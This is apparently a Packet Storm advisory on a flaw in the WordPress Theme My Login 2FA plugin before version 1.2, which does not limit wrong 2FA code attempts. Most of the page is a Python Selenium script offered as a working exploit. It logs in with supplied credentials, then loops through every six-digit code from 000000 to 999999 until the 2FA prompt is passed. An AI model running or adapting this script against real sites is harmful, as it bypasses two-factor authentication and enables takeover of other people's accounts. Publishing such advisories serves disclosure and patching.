WordPress Theme My Login 2FA plugin versions prior to 1.2 suffer from a brute forcing vulnerability.
fe8aceb8123364ee1922662e5a7cfebebb8673ffd8e52fc079dba68cb781494fThe theme my login plugin before 1.2 does not check how often a 2FA code was wrongly entered, allowing a bruteforce of codes to bypass 2FA effectively. A working python exploit:
from typing import KeysView
from selenium.webdriver.common.by import By
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
driver = webdriver.Firefox()
driver.get("websiteloginhere")
# Locate the username field by its 'id' attribute and fill it in
username_field = driver.find_element(By.ID, "user_login")
username_field.click()
username_field.send_keys("usernamehere")
# Locate the password field by its 'id' attribute and fill it in
password_field = driver.find_element(By.ID, "user_pass")
password_field.click()
password_field.send_keys("passwordhere")
# Locate the Log In button and click it
login_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']")
login_button.click()
# FROM HERE, keep doing this from 000000 till 999999 or till you can not find the input anymore after waiting
for i in range(1000000):
code = str(i).zfill(6)
try:
wait = WebDriverWait(driver, 10)
code_field = wait.until(EC.element_to_be_clickable((By.XPATH, "//input[@name='code' and @type='text']")))
except:
break
code_field.click()
code_field.clear()
code_field.send_keys(code)
verify_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']")
verify_button.click()
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed